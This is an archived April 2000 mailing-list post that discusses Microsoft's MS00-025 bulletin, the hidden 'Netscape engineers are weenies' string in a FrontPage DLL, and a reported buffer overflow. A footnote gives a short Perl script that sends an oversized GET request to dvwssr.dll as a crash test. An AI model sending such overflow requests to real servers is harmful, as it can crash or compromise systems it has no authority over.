Re: MS secret password
by "Harold A. Driscoll" <harold(at)driscoll.chi.il.us>
|
| Date: |
Fri, 14 Apr 2000 21:52:52 -0500 |
| To: |
John.ksi(at)webplus.net |
| Cc: |
hwg-servers(at)hwg.org |
| In-Reply-To: |
webplus |
| |
todo: View
Thread,
Original
|
|
At 06:09 14-04-00 , John.ksi(at)webplus.net wrote:
>>From today's Wall Street Journal:
>
>"Microsoft's engineers included in some of its Internet
>software a secret password that could be used to access
>thousands of Web sites."
Microsoft now has released security bulletin MS00-025 which assures us that
"Press reports have claimed that there is a password involved in this
vulnerability, but this is not correct. The component uses an obfuscation
key, but it is unrelated to the vulnerability."
A revealing choice of embedded text string (read it backwards):
"!seineew era sreenigne epacsteN"
>I'll withhold my snide remarks... :|
That is going to be a real challenge, particularly if Microsoft's
assessment of the extent of the vulnerability proves to be as lame as a
subsequent posting to NTBugTraq would suggest.
Our list of issues seems to be growing:
* The willingness by WSJ to go to press with part of a story, rather than
getting a full story and _then_ going to press.
* The actual (and IMHO nontrivial) security issues addressed in MS00-025.
* The "fireable offense" text string in the two DLL modules.
* The lack of code review and quality assurance that allowed such code to
be released.
* The reported Buffer Overflow security hole in that same module.
* The apparently very lame security analysis by Microsoft, addressing only
the part of the security problem that was spoon-fed to them.
* It is hard (for example) to imagine a serious product (FP for the DLL)
pre-release test suite without a test similar to Gerardo Richarte's [1].
* Who knows where this story will turn next.
I'll close with a quote from Rain Forest Puppy in UMBRA Advisory RFP2K02 on
this very topic:
"Regardless if Netscape engineers are weenies, Microsoft engineers are
definitely pompous"
Safe computing, /Harold
=============================
[1]
#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Harold A. Driscoll mailto:Harold(at)Driscoll.Chi.IL.US
#include <std/disclaimer> http://Driscoll.Chi.IL.US
HWG: hwg-servers mailing list archives,
maintained by Webmasters @ IWA
This page is part of a preserved archive of archives.hwg.org. The site is no longer active and its content is not maintained. For enquiries about this archive, write to archive(at)iwanet.org.